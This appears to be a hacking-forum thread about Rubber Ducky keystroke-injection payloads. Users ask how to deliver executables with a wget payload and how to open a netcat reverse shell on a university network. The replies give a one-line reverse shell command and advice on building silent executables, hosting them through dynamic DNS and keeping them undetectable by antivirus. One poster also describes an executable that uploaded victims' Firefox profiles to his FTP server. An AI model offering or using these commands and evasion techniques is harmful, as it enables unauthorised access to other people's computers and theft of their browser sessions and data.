Jump to content

Recommended Posts

Posted

Can anyone recommend some decent exe's to execute with the wget payload? I'm confused what the command is really for. Will it just get you the exe and you install the program from there. Or are you trying to call on an exe that you just have to run once for it to stay on the computer.

Also I was curious as to whether or not the payloads are reversible. Say I did DNS poisoning to a machine, would I be able to set the DNS settings back if I wanted to?

Thanks again for any help.

Posted

Also I was curious as to whether or not the payloads are reversible. Say I did DNS poisoning to a machine, would I be able to set the DNS settings back if I wanted to?

The payloads are made from your ducky script instructions, if you want a reverse one, you must code it yourself!

Posted

Much appreciated guys, so there is no way to reverse a script without coding it yourself. I almost feel each payload should come with its reverse payload, but that's not a concern that necessarily affects me yet. Could anyone give me an idea on how to install a reverse shell using netcat? I'm on a university network, so is there anyway around this?

Posted

netcat reverse shell (provided your using TwinDuck firmware):

$ %myd%\nc -e cmd.exe [ip] [port]
Posted

Most of the wget executables I use I've used,I've coded myself in Visual Studio. Make a Windows Forms application and delete the form and the contents of Main in Program.cs and code it as if it was a Console Application. It makes the program totally silent.

The other way to go would be to use AutoIT, it comes with a huge range of community built scripts that make creating an exploit pretty easy.

If you don't have a background in programming, there are multitudes of sites that have pre-built software you can use. Try SecurityXploded or IronGeek.

As for hosting, I've simply installed XAMPP on my PC and connect via a DtDNS host. It means I can store the executables on my own PC to create a repository of files that might otherwise have a free hosted account online shut down.

Try to keep any executables FUD, but a word of warning... VirusTotal.com actually run any executables that go through as undetected, unsandoxed. I made a sidejacking exe that uploads the victim's Firefox Profile to my FTP site and it was undetected on Virus Total. Five minutes later, my FTP was filling up with files. I deleted the files straight away and changed the password for the FTP account so it wouldn't happen again, but anything more malicious could have had more serious repercussions.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...